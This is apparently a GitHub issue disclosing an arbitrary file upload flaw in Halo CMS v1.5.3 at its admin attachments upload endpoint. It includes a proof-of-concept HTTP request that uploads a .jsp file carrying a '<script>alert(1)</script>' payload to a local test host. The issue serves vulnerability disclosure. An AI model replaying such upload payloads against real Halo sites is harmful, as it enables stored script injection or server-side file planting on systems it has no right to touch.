Skip to content

Halo cms v1.5.3 has an arbitrary format file upload vulnerability at /api/admin/attachments/upload #1

Open
@zongdeiqianxing

Description

https://github.com/halo-dev/halo/

Halo cms v1.5.3 has an arbitrary format file upload vulnerability at /api/admin/attachments/upload. Attackers can upload files in formats such as jsp、html etc.

Proof of Concept

POST /api/admin/attachments/upload HTTP/1.1
Host: 127.0.0.1:8090
Content-Length: 219
Admin-Authorization: 244a0b5340d943ffb8be55bbf3c0db2f
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFxTUuVBMVJqfHQHX
Origin: http://127.0.0.1:8090
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:8090/admin/index.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=node04b75v93fl79m6b5ujcpwcvp82.node0
Connection: close

------WebKitFormBoundaryFxTUuVBMVJqfHQHX
Content-Disposition: form-data; name="file"; filename="2.jsp"
Content-Type: application/octet-stream

1<script>alert(1)</script>
------WebKitFormBoundaryFxTUuVBMVJqfHQHX--

image
image

permalink: AttachmentServiceImpl.java L110
Security is not checked in the relevant code
image

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions